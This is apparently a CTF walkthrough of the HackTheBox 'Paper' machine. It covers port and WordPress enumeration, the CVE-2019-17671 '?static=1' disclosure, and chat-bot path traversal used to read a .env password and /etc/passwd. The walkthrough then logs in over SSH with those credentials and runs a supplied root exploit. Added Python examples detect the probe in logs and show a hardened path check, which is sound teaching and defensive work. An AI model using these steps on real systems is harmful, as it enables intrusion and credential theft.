
HackTheBox-Paper-Walkthrough

This is the walkthrough for the Paper lab on HackTheBox (https://app.hackthebox.com/machines/Paper). This is my first public walkthrough for a CTF. I would appreciate any constructive criticism and suggestions.

This lab/CTF focuses on enumeration and LFI skills; unlike many other CTFs, it does not focus on privilege escalation or other things.


NOTE: Replace <ip> with your machine's IP. I have purposefully redacted my machine's IP with "*".


Enumerating

I used nmap to scan the IP and see the open ports and the services running on them.

nmap -sC -sV <ip>
nmap -sC -sV **.**.**.***
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 03:48 IST
Nmap scan report for office.paper (**.**.**.***)
Host is up (0.26s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: Blunder Tiffin Inc. – The best paper company in the elec...
|_http-generator: WordPress 5.2.3
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods: 
|_  Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
|_http-title: HTTP Server Test Page powered by CentOS
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.51 seconds  

I visited the IP in a browser, but it was only the default test page and nothing interesting.

So I decided to check the response headers with curl:

curl -I <IP>
curl -I **.**.**.***
HTTP/1.1 403 Forbidden
Date: Wed, 30 Mar 2022 22:19:52 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Content-Type: text/html; charset=UTF-8

We notice X-Backend-Server: office.paper, so in order to access this host let's add it to our hosts list at /etc/hosts:

sudo nano /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
**.**.**.***    office.paper 
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Then I visited office.paper in the browser and figured out it was a WordPress website, as wordpress.org was mentioned at the bottom of the page, and I was sure after viewing the page source.

The first thing I do if I find a WordPress website is to scan it with wpscan to look for vulnerabilities and users (the enumerate options are comma-separated):

wpscan --url http://office.paper/ -e vp,vt,u

WOOOAH, we found that it was using the vulnerable WordPress version 5.2.3, which nmap had also reported.

Exploiting

I went to Exploit-DB, searched for WordPress 5.2.3 and found an exploit for CVE-2019-17671:
https://www.exploit-db.com/exploits/47690

We just have to append ?static=1 to office.paper to reveal the secret page in the browser.

http://office.paper/?static=1
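As an added example that is not part of this walkthrough: a small Python detector a defender could run over Apache access-log lines to spot the ?static=1 query shape used against this WordPress version. The log lines are constructed (RFC 5737 addresses), and the function names are my own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format, as written by the httpd seen in the nmap scan above.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines, not taken from the lab.
SAMPLE_LOG = """\
192.0.2.10 - - [31/Mar/2022:03:50:01 +0530] "GET / HTTP/1.1" 200 19871 "-" "Mozilla/5.0"
192.0.2.10 - - [31/Mar/2022:03:50:12 +0530] "GET /?static=1 HTTP/1.1" 200 64321 "-" "Mozilla/5.0"
192.0.2.10 - - [31/Mar/2022:03:50:15 +0530] "GET /wp-login.php HTTP/1.1" 200 5210 "-" "Mozilla/5.0"
198.51.100.7 - - [31/Mar/2022:03:51:40 +0530] "GET /index.php?static=1 HTTP/1.1" 200 64321 "-" "curl/7.81.0"
198.51.100.7 - - [31/Mar/2022:03:51:44 +0530] "GET /static/logo.png HTTP/1.1" 200 4412 "-" "curl/7.81.0"
"""


def parse_line(line: str):
    """Split one access-log line into its fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    entry["query"] = parse_qs(parts.query)  # {'static': ['1']} for the probe
    return entry


def is_static_probe(entry: dict) -> bool:
    """True when the request carries a 'static' query parameter, the shape of
    the CVE-2019-17671 request. The query is checked, not the path, so a
    request for '/static/logo.png' is not a hit."""
    return "static" in entry["query"]


def find_static_probes(log_text: str):
    """Return (client, path, status) for every flagged line in the log text."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_static_probe(entry):
            hits.append((entry["ip"], entry["path"], entry["status"]))
    return hits


if __name__ == "__main__":
    for ip, path, status in find_static_probes(SAMPLE_LOG):
        print(f"{ip} requested {path} with static= -> HTTP {status}")
```

The status column tells you whether the server answered the request; the real fix is keeping WordPress patched, and a hit count from a scan like this is a quick way to see whether the version nmap reported was ever probed.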

Here we found that there is another host, chat.office.paper, so we also add that to our /etc/hosts:

127.0.0.1	localhost
127.0.1.1	kali
**.**.**.***   office.paper  chat.office.paper
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Upon visiting chat.office.paper and messing with it, I found that the admin DwightKSchrute had added a bot called Recyclops.

After messing with Recyclops I figured out that it takes certain commands, as mentioned in the chat, but each has to start with "recyclops":
recyclops list ./ = ls
recyclops file ./<filename> = cat <filename>

Yes, I did LFI by adding ./.
I did not find anything interesting using recyclops list ./, so I decided to go deeper by using

recyclops list ./../

I found user.txt, but we didn't have permission to read it.

There was an unusual directory named "hubot", so I listed its contents using

recyclops list ./../hubot/

I read each file's contents and found a password in the .env file. I used the command

recyclops file ./../hubot/.env

I had a PASSWORD but no USERNAME, so I read the /etc/passwd file using

recyclops list ./../../../etc/passwd

We found the username dwight.
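As an added example, not code from this walkthrough or from the Hubot project: the Recyclops commands take a path and join it onto the bot's working directory, which is why ./../ walks out of it. The Python below contrasts that unchecked join with a hardened reader that resolves the path first and refuses anything outside the base directory. The directory layout, file names and the secret in .env are constructed stand-ins, not the lab's real files.

```python
import tempfile
from pathlib import Path


def build_sandbox(root: Path) -> Path:
    """Constructed stand-in for the bot's working directory: a 'files' folder
    the bot is meant to serve, and a .env one level up it should never expose."""
    files = root / "hubot" / "files"
    files.mkdir(parents=True)
    (files / "readme.txt").write_text("public note\n")
    (root / "hubot" / ".env").write_text("BOT_PASSWORD=constructed-example-secret\n")
    return files


def vulnerable_read(base: Path, user_path: str) -> str:
    """The bug: the user-supplied path is joined onto the base directory and
    read as-is, so './../.env' resolves one level up and the secret comes back."""
    return (base / user_path).read_text()


def safe_read(base: Path, user_path: str) -> str:
    """Hardened form: resolve '..' and symlinks first, then require the result
    to sit inside the base directory. An absolute path replaces the base when
    joined, so it fails the same containment test."""
    base_real = base.resolve()
    target = (base_real / user_path).resolve()
    if target != base_real and base_real not in target.parents:
        raise PermissionError(f"path escapes base directory: {user_path}")
    if not target.is_file():
        raise FileNotFoundError(user_path)
    return target.read_text()


def demo() -> dict:
    """Run both readers against the same requests and report what each did."""
    with tempfile.TemporaryDirectory() as tmp:
        base = build_sandbox(Path(tmp))
        results = {
            "vuln_readme": vulnerable_read(base, "./readme.txt"),
            "vuln_env": vulnerable_read(base, "./../.env"),  # secret leaks here
            "safe_readme": safe_read(base, "./readme.txt"),
        }
        for label, path in (("safe_env", "./../.env"), ("safe_abs", "/etc/passwd")):
            try:
                safe_read(base, path)
                results[label] = "allowed"
            except PermissionError:
                results[label] = "refused"
        return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value.strip()}")
```

The containment check is done on the resolved path rather than on the string, so a symlink inside the served directory that points elsewhere is refused too; and the secret only mattered because the .env file was readable from the bot's working tree at all, which is the second thing to fix.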

Gaining Access

I SSH into the server using the credentials found.

ssh dwight@<ip>

Enter the password you found.
Now you have remote shell access via SSH.

I read user.txt:

cat user.txt

Priv-Esc

This lab did not focus too much on privilege escalation, as I would assume it was about enumeration and LFI.
linpeas.sh and exploit.py were already there in that directory.

You can directly run exploit.py to gain root access by using

python3 exploit.py

If it doesn't work, run the same command again!
or

You can run linpeas.sh to find a vulnerability, find an exploit online, transfer it to this machine and run it, but it was already given to us, i.e. exploit.py. To run linpeas.sh use the command

./linpeas.sh

or

bash linpeas.sh

Read the root flag at /root/root.txt:

cat /root/root.txt
